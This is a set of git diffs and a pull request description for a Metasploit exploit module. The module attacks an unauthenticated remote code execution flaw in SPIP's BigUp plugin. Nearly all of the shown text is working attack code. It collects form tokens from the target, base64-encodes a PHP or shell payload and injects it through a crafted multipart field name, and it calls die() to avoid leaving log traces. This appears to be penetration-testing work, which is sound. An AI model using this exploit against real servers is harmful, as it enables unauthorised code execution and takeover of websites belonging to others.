+        print_status('SPIP version is in the vulnerable range.')
+        break
+      end
+    end
+
+    plugin_version = spip_plugin_version('bigup')
+
+    unless plugin_version
+      print_warning('Could not determine the version of the bigup plugin.')
+      return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
+    end
+
+    return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+
+    CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
+  end
+
+  def get_form_data
+    pages = []
+
+    form_page = datastore['FORM_PAGE']
+    pages << form_page if form_page && form_page.downcase != 'auto'
+
+    pages.concat(%w[login spip_pass contact]) if pages.empty?
+
+    pages.each do |page|
+      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")
+      res = send_request_cgi('method' => 'GET', 'uri' => url)
+
+      next unless res&.code == 200
+
+      doc = Nokogiri::HTML(res.body)
+      action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text
+      args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text
+
+      next unless action && args
+
+      print_status("Found formulaire_action: #{action}")
+      print_status("Found formulaire_action_args: #{args}")
+      return { action: action, args: args }
+    end
+
+    nil
+  end
+
+  def php_exec_cmd(encoded_payload)
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    <<-END_OF_PHP_CODE
+            #{php_preamble(disabled_varname: dis)}
+            $c = base64_decode("#{encoded_clean_payload}");
+            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+  end
+
+  def exploit
+    form_data = get_form_data
+
+    unless form_data
+      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
+    end
+
+    print_status('Preparing to send exploit payload to the target...')
+
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
+    post_data.add_part('1', nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
+    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
+    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    }, 1)
+  end
+end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
-    return CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+    return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
 
     CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
   end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'Privileged' => false,
-        'DisclosureDate' => '2024-09-01',
+        'DisclosureDate' => '2024-09-06',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -117,12 +117,11 @@ class MetasploitModule < Msf::Exploit::Remote
   # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).
   # We need to check multiple pages because the configuration of SPIP can vary.
   def get_form_data
-    pages = []
+    pages = %w[login spip_pass contact]
 
-    form_page = datastore['FORM_PAGE']
-    pages << form_page if form_page&.downcase != 'auto'
-
-    pages.concat(%w[login spip_pass contact]) if pages.empty?
+    if datastore['FORM_PAGE']&.downcase != 'auto'
+      pages = [datastore['FORM_PAGE']]
+    end
 
     pages.each do |page|
       url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vulnerable_ranges.each do |range|
       if rversion.between?(range[:start], range[:end])
-        print_status('SPIP version is in the vulnerable range.')
+        print_good('SPIP version #{rversion} is vulnerable.')
         break
       end
     end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    rversion = spip_version
+    rversion = spip_version || spip_plugin_version('spip')
     return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
 
     print_status("SPIP Version detected: #{rversion}")
@@ -94,23 +94,26 @@ class MetasploitModule < Msf::Exploit::Remote
       { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }
     ]
 
-    vulnerable_ranges.each do |range|
-      if rversion.between?(range[:start], range[:end])
-        print_good("SPIP version #{rversion} is vulnerable.")
-        break
-      end
+    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }
+
+    unless is_vulnerable
+      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
     end
 
+    print_good("SPIP version #{rversion} is vulnerable.")
     plugin_version = spip_plugin_version('bigup')
+    print_status("Bigup plugin version detected: #{plugin_version}")
 
     unless plugin_version
       print_warning('Could not determine the version of the bigup plugin.')
       return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
-    return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+    if plugin_version < Rex::Version.new('3.2.12')
+      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")
+    end
 
-    CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
+    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
   end
 
   # This function tests several pages to find a form with a valid CSRF token and its corresponding action.
@@ -142,55 +145,55 @@ class MetasploitModule < Msf::Exploit::Remote
 
     nil
   end
-end
 
-# This function generates PHP code to execute a given payload on the target.
-# We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
-# The payload is encoded in base64 to prevent issues with special characters.
-# The generated PHP code includes the necessary preamble and system block to execute the payload.
-# This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
-def php_exec_cmd(encoded_payload)
-  vars = Rex::RandomIdentifier::Generator.new
-  dis = "$#{vars[:dis]}"
-  encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-  <<-END_OF_PHP_CODE
-            #{php_preamble(disabled_varname: dis)}
-            $c = base64_decode("#{encoded_clean_payload}");
-            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-  END_OF_PHP_CODE
-end
-
-def exploit
-  form_data = get_form_data
-
-  unless form_data
-    fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
+  # This function generates PHP code to execute a given payload on the target.
+  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
+  # The payload is encoded in base64 to prevent issues with special characters.
+  # The generated PHP code includes the necessary preamble and system block to execute the payload.
+  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
+  def php_exec_cmd(encoded_payload)
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{encoded_clean_payload}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
   end
 
-  print_status('Preparing to send exploit payload to the target...')
+  def exploit
+    form_data = get_form_data
 
-  phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-  b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
+    unless form_data
+      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
+    end
 
-  post_data = Rex::MIME::Message.new
+    print_status('Preparing to send exploit payload to the target...')
 
-  # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
-  post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
 
-  # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
-  post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
+    post_data = Rex::MIME::Message.new
 
-  # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
-  # prevent errors, and stop the execution of PHP after the injection.
-  post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
+    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
+    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
 
-  # This is necessary for the form to be accepted
-  post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
+    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
 
-  send_request_cgi({
-    'method' => 'POST',
-    'uri' => normalize_uri(target_uri.path, 'spip.php'),
-    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-    'data' => post_data.to_s
-  }, 1)
+    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
+    # prevent errors, and stop the execution of PHP after the injection.
+    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
+
+    # This is necessary for the form to be accepted
+    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    }, 1)
+  end
 end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vulnerable_ranges.each do |range|
       if rversion.between?(range[:start], range[:end])
-        print_good('SPIP version #{rversion} is vulnerable.')
+        print_good("SPIP version #{rversion} is vulnerable.")
         break
       end
     end


### PR DESCRIPTION
**Hello Metasploit Team,**

I hope this message finds you well. I am submitting a new module that exploits a Remote Code Execution (RCE) vulnerability found in the BigUp plugin of SPIP. This vulnerability arises from improper handling of multipart form data in file uploads, allowing unauthenticated attackers to execute arbitrary PHP code remotely.

### Affected Versions

- **SPIP versions 4.2.x before 4.2.16**: This includes all versions from 4.2.0 to 4.2.15.
- **SPIP versions 4.3.x before 4.3.2**: This includes all versions from 4.3.0 to 4.3.1.
- **SPIP versions before 4.1.18**: This includes all versions from 4.0.0 to 4.1.17.

### Module Features
- Supports both PHP in-memory payloads and command shell payloads for Unix, Linux, and Windows platforms.
- The module automatically retrieves the necessary form data from the target server to construct the exploit payload.

### Usage
To run the exploit, simply provide the target URL, and the module will handle the payload execution, retrieving any necessary form parameters automatically if the `FORM_PAGE` option is set to 'Auto'.

### References
- [SPIP Security Patch Announcement](https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html)


Thank you for reviewing my submission.

cc: @Vozec @laluka @jvoisin